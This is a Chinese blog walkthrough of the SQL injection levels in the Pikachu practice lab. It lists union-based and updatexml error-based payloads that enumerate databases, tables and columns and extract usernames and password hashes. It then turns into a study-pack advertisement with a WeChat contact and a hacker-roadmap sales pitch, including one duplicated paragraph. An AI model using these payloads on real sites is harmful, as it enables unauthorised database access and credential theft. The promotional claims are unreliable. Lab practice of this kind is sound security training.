SQL注入-Pikachu靶场通关_pikachu靶场通关sql，一起看看这些大厂面试真题查漏补缺吧

payload：
id=1 and 1=1# 回显正常
id=1 and 1=2# 回显不正常
存在注入点

回显不正常，说明带入数据库进行查询，执行了sql语句

判断字段个数

payload:
id=1 order by 1# 回显正常
id=1 order by 2# 回显正常
id=1 order by 3# 回显不正常
说明有2列字段

判断回显点

payload:
id=-1 union select 1,2#

爆数据库

payload：
id=-1 union select user(),database()#
查询数据库的用户，当前数据库

version() 查看数据库版本
@@version_compile_os 查看操作系统

爆数据表

payload：
id=-1 union select database(),table_name from information_schema.tables where table_schema=database()#

爆字段

payload：
id=-1 union select database(),column_name from information_schema.columns where table_name=‘users’#

爆数据信息

payload：
id=-1 union select database(),group_concat(username,“/”,password) from users#

看源码

成功获取用户名以及密码，MD5解密即可

字符型注入(get)

在输入框内输入admin

尝试注入：

admin后加单引号，出现报错

payload：
?name=admin’ and 1=1–+ 回显正常
?name=admin’ and 1=2–+ 回显不正常
存在注入

sql语句被执行，爆出username不存在，说明插入的语句被执行带到数据库当中去查询

接下来的步骤判断字段的个数，看回显点，爆库，爆表，爆字段，都和以上的数字型注入一致，区别就是类型不同，本题为字符型，单引号闭合，其他注入语句和以上一致。

搜索型注入

在输入框当中，尝试输入数字1

分析为，sql语句当中存在模糊查找，%字符，与一般的字符型注入和数字型注入不同的是，搜索型注入的sql语句往往形如：select xxx from xxx where xxx like ‘%abcd%’

本质上和字符型注入的方式基本一样但闭合的特殊符号换成了%

测试注入点：

payload：
?name=1%’ and 1=1–+ 回显正常
?name=1%’ and 1=2–+ 回显不正常
存在注入

说明sql语句被带到数据库当中去查询，被执行，没有查到信息

接下来的步骤判断字段的个数，看回显点，爆库，爆表，爆字段，都和以上的数字型注入一致（注入sql语句也大体一致），区别就是类型不同，本题为搜索型，%'闭合，其他注入语句和以上一致。

xx型注入

不同的闭合方式分别去测试，本题为')闭合

使用圆括号尝试构造闭合：

name=1 正常

name=1’ 报错

name=1’) 报错

name=1’) --+ 正常

接下来的步骤判断字段的个数，看回显点，爆库，爆表，爆字段，都和以上的数字型注入一致（注入sql语句也大体一致），区别就是类型不同，本题为其他类型的闭合方式，')闭合，其他注入语句和以上一致。

判断字段个数：

其他的爆库，爆表，爆字段，获取信息等sql语句和以上基本一致（数字型注入）。

insert/update注入

注册用户：

首先点击注册账号

注册时，抓包获取信息

使用bp抓包，获取数据包后，发送给重发器进行测试

测试注入：

从username处开始尝试

payload：
username=xiaohong’ or updatexml(1,concat(0x7e,database()),3) or '&password=xiaohong123456&sex=%E5%A5%B3&phonenum=123123&email=hebei&add=hebei&submit=submit

’ or updatexml(1,concat(0x7e,database()),3) or ’

若查看其他数据库信息，替换database()即可

爆数据表：

payload：
’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘pikachu’ limit 0,1),0x7e),1) and ’
通过修改limit 0,1当中第一个数字的值，逐一查看即可
…

’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘pikachu’ limit 3,1),0x7e),1) and ’
当limit 3,1的时候，可查看到users这张表

爆字段

payload：
’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users’ limit 0,1),0x7e),1) and ’
相同的道理，limit逐一去看列的信息
…

当limit 12,1的时候，发现username
’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users’ limit 12,1),0x7e),1) and ’

当limit 13,1的时候，发现password
’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users’ limit 13,1),0x7e),1) and ’

接下来就是获取username和password的信息

payload：
爆username的值：

’ and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) and ’

’ and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1) and ’

’ and updatexml(1,concat(0x7e,(select username from users limit 2,1),0x7e),1) and ’
同样的道理还是limit去逐一查看切换第一个数字的值即可
limit 0,1 查出admin用户
limit 1,1 查出pikachu用户
limit 2,1 查出test用户

payload：
爆password
与username对应
admin密码：
’ and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) and ’
pikachu密码：
’ and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) and ’
test密码：
’ and updatexml(1,concat(0x7e,(select password from users limit 2,1),0x7e),1) and ’

成功获取密码

admin密码：

pikachu密码：

test密码：

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

如何自学黑客&网络安全

黑客零基础入门学习路线&规划

初级黑客
1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（一周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（一周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（一周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）
恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；如果等保模块学的好，还可以从事等保工程师。薪资区间6k-15k

到此为止，大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗？

如果你想要入坑黑客&网络安全，笔者给大家准备了一份：282G全网最全的网络安全资料包评论区留言即可领取！

7、脚本编程（初级/中级/高级）
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力.

如果你零基础入门，笔者建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习；搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP， IDE强烈推荐Sublime；·Python编程学习，学习内容包含：语法、正则、文件、 网络、多线程等常用库，推荐《Python核心编程》，不要看完；·用Python编写漏洞的exp,然后写一个简单的网络爬虫；·PHP基本语法学习并书写一个简单的博客系统；熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)；·了解Bootstrap的布局或者CSS。

8、超级黑客
这部分内容对零基础的同学来说还比较遥远，就不展开细说了，附上学习路线。

网络安全工程师企业级学习路线

如图片过大被平台压缩导致看不清的话，评论区点赞和评论区留言获取吧。我都会回复的

视频配套资料&国内外网安书籍、文档&工具

当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。

一些笔者自己买的、其他平台白嫖不到的视频教程。

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。

一些笔者自己买的、其他平台白嫖不到的视频教程。

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-yjwk0vOp-1712718210920)]